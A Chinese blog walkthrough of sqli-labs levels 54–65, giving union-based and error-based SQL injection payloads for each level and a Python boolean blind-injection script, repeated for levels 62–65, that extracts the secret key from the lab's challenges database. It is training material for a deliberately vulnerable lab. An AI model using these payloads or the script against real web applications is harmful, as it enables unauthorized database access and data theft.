sqli.labs靶场(54-65关)

于 2024-02-05 19:04:06 发布
阅读量1k 收藏 29
点赞数 13
文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyy8910599download/article/details/136043823
版权

54、第五十四关

提示尝试是十次后数据库就重置,那我们尝试union

原来是单引号闭合

id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

数据库:challenges,表名是:4c7k78qe8t,就一个表

id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='4c7k78qe8t')--+

字段为:id,sessid,secret_MWHJ,tryy

id=-1' union select 1,2,(select secret_MWHJ from 4c7k78qe8t)--+

查出Secret Key:KojCXmD2nIqg6AyFzp5Vi1jq

将获取的key值放到下面输入框点击提交就完成所有步骤。

55、第五十五关

这关也可以尝试10次,后表名,字段名,数据随机改变

id=-1' union select 1,2,database()--+

id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges')--+

id=-1' union select 1,2,(select group_concat(secret_YV1N) from  qthriw02yn)--+

secret_YV1N:f11TD89MthkTPZnwzxOHg4OX

56、第五十六关

这关可以尝试14次后才重置表数据

id=-1') union select 1,2,3--+尝试出单引号加括号闭合

id=-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='wcqh1ndqln')--+

id=-1') union select 1,2,(select secret_TCFR from wcqh1ndqln)--+

secret key:cityELb2pMtzbUtJLNTMGnHj

57、第五十七关

尝试出双引号闭合

id=-1" union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

id=-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='dtxwciipgl')--+

然后查出secret key:qZFAb0BLbaFXnzxh6kjKOYkK

id=-1" union select 1,2,(select group_concat(secret_KB70) from dtxwciipgl)--+

58、第五十八关

这关只能试五次

有报错,可以尝试报错注入

id=-1' and extractvalue(1,concat(0x7e,database()))--+

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='4l6g2539j4')))--+

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_0FM9) from 4l6g2539j4)))--+

secret key:cHu2PRJ1aEZ7uZ8OVcFx1x80

59、第五十九关

根据经验尝试双引号,结果不对,是数值型

id=1 and extractvalue(1,concat(0x7e,database()))--+

id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='egnu8zwkpl')))--+

接下来根据egnu8zwkpl表查secret_6QHK:9DwDyopuZPFpopuiXwgBLtmA然后提交即可

60、第六十关

?id=1"根据报错看出后面还有个括号,应该是双引号加括号闭合

id=1") and extractvalue(1,concat(0x7e,database()))--+

id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uz68fmjku1')))--+

secret key:PwGGU5F3ssSpFEMqDUGeNxL6

61、第六十一关

有报错,感觉是双引号加双括号闭合,还是报错注入尝试

id=1')) and extractvalue(1,concat(0x7e,database()))--+

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='7cqx2e789u')))--+

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_VHAS) from o8qdqu14j4)))--+

62、第六十二关

这关没有报错信息,无法用报错注入

id=1')--+尝试出是单引号加括号注入

看来得用盲注,上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-62/?id=1') "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secret key:xhsby2cnal7av3nvaumrzhzf

63、第六十三关

单引号闭合,没有报错信息,还是盲注

还是用脚本方便

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-63/?id=1' "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secrect key:yz4ukedoyymuczebysso01ny

提交secret key

64、第六十四关

经过多次尝试是两个括号闭合,没有报错信息,还是盲注;上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-64/?id=1)) "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secrect key:hrpd70rpt9uwatrucfsrz23v

提交secret key

65、第六十五关

经测试发现是双引号加括号闭合,没有报错信息,还是考盲注,方便的脚本继续跑

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-65/?id=1%22) "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secrect key:nneodmdybdsnggrqwmfwlxe7

提交secret key

沧海一粟@星火燎原
关注
  • 13
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs靶场challenges第54-75(超详细)
weixin_51566481的博客
08-18 2085
sqlilabs,sql注入
sql-labs54~65
qq_44663230的博客
09-12 1497
sql-labs54~65
sqli-labs-master 54-65(附解题思路及解析)
weixin_47306547的博客
09-08 1006
目录 第 54 ​​ 第 55-57 第 58 第 59 -61 第 62 -65 第 54 1. ?id=1 -- 回显正常 2. ?id=1' -- 回显异常 3. ?id=1' --%20 -- 回显正常 结论:字符型,需要用 ' 闭合 4. ?id=1' order by 3 --%20 -- 回显正常 5..
基于Sqli-Labs靶场的SQL注入-54~65
Joker
01-12 481
主要讲最后几的通方法。
Sqli_labs65详解
weixin_45281236的博客
10-10 323
【代码】Sqli_labs65详解。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
03-17
SQL-labs靶场包含了丰富的练习场景,涵盖了各种类型的SQL注入漏洞,例如:盲注、时间盲注、基于错误的注入、联合查询注入、堆叠查询注入等。这些练习可以帮助你理解每种注入方式的工作原理,以及如何利用它们进行...
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
02-12
sqli-labs靶场
sqli-labs(54-65)
weixin_44178492的博客
10-27 651
五十四(GET - challenge - Union- 10 queries allowed - Variation 1) 翻到第四页了,这一页的内容算是前面的综合考核了 看一下界面,要求,从challenge数据库中取出秘钥,要求步骤不超过10步 输入?id=1',页面无显示 再输入?id=1",页面返回数据 通过上面两个步骤,足以判断出有单引号参与了闭合,但还需要判断是否有单引号参与闭合,这就需要使用到and 1=1了,可以使用注释符注释掉多余内容,也可以使用符号直接闭合。 输入?id=1'
sqli-labs Less-54、55、56、57(sqli-labs指南 54、55、56、57)
m0_54899775的博客
12-29 1605
sqli-labs Less-54、55、56、57(sqli-labs指南 54、55、56、57)
SQLi-labs 注入 54-75
感恩
09-19 326
SQLi-labs 注入 54-75
sqli-labs攻略54-65[Challenges]
热门推荐
Keepb1ue的博客
09-02 1万+
Advanced Injections 文章目录Advanced Injectionsless-54less-55less-56less-60less-62less-63less-64less-65 最后一篇补上。 less-54 字符型注入,只不过这里只能限制十次查询,超过十次就会随机更换表名和字段名。也就是说我们要在10次内查询所有结果,这其实是够的。 http://127.0.0.1/sql-labs/less-54/index.php?id=-1' union select 1,version(
sqli-labs(54-65)终章
qq_43579362的博客
03-04 628
Page4終章以为会很难,结果就是限定注入次数,其他和前面一样,虽然很接近现实注入,但是还是可以采取一些手段来‘无限’注入,比如代理,脚本等。。。 Less-54~57 这4都是使用联合查询注入,so easy。。。 Less-54 闭合方式:id=1'--+ Less-55 闭合方式:id=1)--+ Less-56 闭合方式:id=1')--+ Less-57 闭合方式:id="--+ Le...
sqlilabs54-65详细教程
黑白的博客
11-08 975
声明 学习SQL注入,提高网路安全能力 information_schema 过之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
sqli-labs记录54-65
weixin_43938446的博客
03-31 233
54.10次的尝试中从数据库的随机表中转储,每次重置,挑战都会生成随机表名、列名和表数据。payload:?id=3’%23,正常显示,先查看数据库名称。payload:?id=-3’ union select 1,2,database()%23 接下来查看表名称。payload:/?id=-3’ union select 1,2,group_concat(table_name) from inf...
Sqli-labs 复习 Less54-65 挑战
kevinhanser
08-12 778
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 挑战卡 Less-54 union - 1 源代码 // Checking the cookie on the page and populate the table with random value. $times=10 setcookie("challen...
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值